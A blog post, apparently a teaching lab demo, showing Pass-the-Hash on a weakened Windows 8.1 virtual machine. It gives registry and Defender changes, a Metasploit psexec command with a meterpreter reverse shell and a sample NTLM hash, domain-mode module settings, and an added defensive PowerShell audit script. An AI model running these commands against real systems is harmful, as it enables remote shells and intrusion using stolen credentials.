Pass the Hash on Windows 8.1

Microsoft claims that the Pass the Hash exploit has finally been patched in Windows 8.1, as trumpeted in October 2013:

The man who made the patch will be speaking next week at CCSF.

But when I posted this on Twitter, @obscuresec, @passingthehash, and @jameslyne engaged me in a lively discussion, claiming PtH still works.

And, with their help, I got it working two ways.

1. Simple Demo on a Workgroup


I made a clean install of Windows 8.1 into a virtual machine, and made these adjustments, as recommended here:

1. In HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters, make sure "RequireSecuritySignature" is set to 0 (it was)

2. In HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, add a new DWORD (32-bit) called "LocalAccountTokenFilterPolicy" and set it to 1

3. Disable real-time protection in Windows Defender.

From Kali Linux, perform a Pass-the-Hash attack with this command, adjusting the IP addresses to be correct:

msfcli /usr/share/metasploit-framework/lib/msf/core/exploit/windows/smb/psexec PAYLOAD=windows/meterpreter/reverse_tcp LHOST= LPORT=443 RHOST= SMBUser=Admin2 SMBPass=aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 E

It works, as shown below:

2. In a Domain

Here's what I did:

1. Make a Server 2012 domain controller as explained here:
2. Join Win 8.1 machine to domain

3. In "Network and Sharing Center", click "Change advanced sharing settings". In the Domain profile, turn on "network discovery" and "file and printer sharing".

4. Turn off Windows Firewall for Domain profile

5. In Kali:


cd .msf4/modules
mkdir exploits
cd exploits
mkdir windows
cd windows
mkdir powershell
cd powershell

use exploit/windows/powershell/powershell_psexec
set LHOST
set ARCH x86
set SMBDomain
set SMBUser Administrator
set SMBPASS 00000000000000000000000000000000:e19ccf75ee54e06b06a5907af13cef42

As you can see below, it worked!
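
Both demos depended on settings changed on the Windows 8.1 target: the two registry values and the Defender change in the workgroup steps, and the firewall change in the domain steps. The PowerShell below is an added example, not code from the original post, that audits a host for those settings; `Get-RegDword` is a helper name introduced here for illustration.

```powershell
# Added example: audit a host for the settings changed in the two demos.
# Get-RegDword is a helper defined here for illustration.
function Get-RegDword {
    param([string]$Path, [string]$Name)
    # Returns $null when the key or the value does not exist.
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

$findings = @()

# Workgroup step 1: SMB server signing is not required.
$sig = Get-RegDword 'HKLM:\SYSTEM\CurrentControlSet\Services\LanManServer\Parameters' 'RequireSecuritySignature'
if ($sig -ne 1) {
    $shown = if ($null -eq $sig) { 'absent' } else { $sig }
    $findings += "RequireSecuritySignature=$shown (SMB server does not require signing)"
}

# Workgroup step 2: a value of 1 turns off UAC remote token filtering
# for local accounts. Absent or 0 is the default.
$latfp = Get-RegDword 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' 'LocalAccountTokenFilterPolicy'
if ($latfp -eq 1) {
    $findings += 'LocalAccountTokenFilterPolicy=1 (UAC remote token filtering for local accounts is off)'
}

# Workgroup step 3: Defender real-time protection disabled.
if (Get-Command Get-MpComputerStatus -ErrorAction SilentlyContinue) {
    $mp = Get-MpComputerStatus -ErrorAction SilentlyContinue
    if ($mp -and -not $mp.RealTimeProtectionEnabled) {
        $findings += 'Windows Defender real-time protection is disabled'
    }
}

# Domain step 4: firewall turned off for the Domain profile.
if (Get-Command Get-NetFirewallProfile -ErrorAction SilentlyContinue) {
    $fw = Get-NetFirewallProfile -Name Domain -ErrorAction SilentlyContinue
    if ($fw -and "$($fw.Enabled)" -eq 'False') {
        $findings += 'Windows Firewall is off for the Domain profile'
    }
}

if ($findings.Count -eq 0) {
    Write-Output 'None of the demo preconditions are present on this host.'
} else {
    $findings | ForEach-Object { Write-Output "[!] $_" }
}
```

Run it from an elevated PowerShell prompt on the host being checked so the Defender and firewall cmdlets can return their status.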

Posted 6:36 pm 2-22-14 by Sam Bowne
Domain version added 8:35 pm 2-22-14